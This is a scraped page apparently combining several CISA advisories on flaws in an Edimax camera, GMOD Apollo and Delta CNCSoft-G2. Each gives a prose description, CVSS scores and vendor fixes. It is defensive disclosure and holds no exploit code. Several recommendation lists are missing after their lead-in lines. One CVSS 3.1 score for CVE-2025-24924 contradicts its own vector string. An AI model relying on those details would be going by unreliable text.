CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
CISA released eight Industrial Control Systems (ICS) advisories on March 4, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.
Successful exploitation of this vulnerability could allow an attacker to send specially crafted requests to achieve remote code execution on the device.
The following versions of Edimax products are affected:
Edimax IC-7100 does not properly neutralize requests. An attacker can create specially crafted requests to achieve remote code execution on the device
CVE-2025-1316 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-1316. A base score of 9.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Akamai SIRT reported this vulnerability to CISA.
Edimax has not responded to CISA requests to coordinate the vulnerability. Affected users are encouraged to reach out to Edimax customer support.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
Successful exploitation of these vulnerabilities could allow an attacker to escalate privileges, bypass authentication, upload malicious files, or disclose sensitive information.
The following GMOD products are affected:
The product does not have sufficient logical or access checks when updating a user's information. This could result in an attacker being able to escalate privileges for themselves or others.
CVE-2025-21092 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2025-21092. A base score of 7.1 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N).
When uploading organism or sequence data via the web interface, the application will unzip and inspect the files and will not check for path traversal in supported archive types.
CVE-2025-23410 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23410. A base score of 9.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Certain functionality within GMOD Apollo does not require authentication when passed with an administrative username
CVE-2025-24924 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2025-24924. A base score of 9.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
After attempting to upload a file that does not meet pre-requisites, GMOD Apollo will respond with local path information disclosure
CVE-2025-20002 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2025-20002. A base score of 6.9 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N).
CISA reported these vulnerabilities to GMOD.
GMOD recommends users to update to the newest Version 2.8.0.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities have been reported to CISA at this time.
Successful exploitation of this vulnerability could allow an attacker to execute code remotely.
Delta Electronics reports that the following versions of CNCSoft-G2, a human-machine interface, are affected:
Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can manipulate users to visit a malicious page or file to leverage this vulnerability to execute code in the context of the current process.
CVE-2025-22881 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-22881. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Trend Micro Zero Day Initiative reported this vulnerability to CISA.
Delta Electronics recommends users update to CNCSoft-G2 v2.1.0.20 or later.
Delta Electronics published a product cybersecurity advisory (Delta-PCSA-2025-00003) for this issue.
For more information, please contact Delta Electronics Customer Service.
Delta Electronics recommends the following general cybersecurity practices:
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.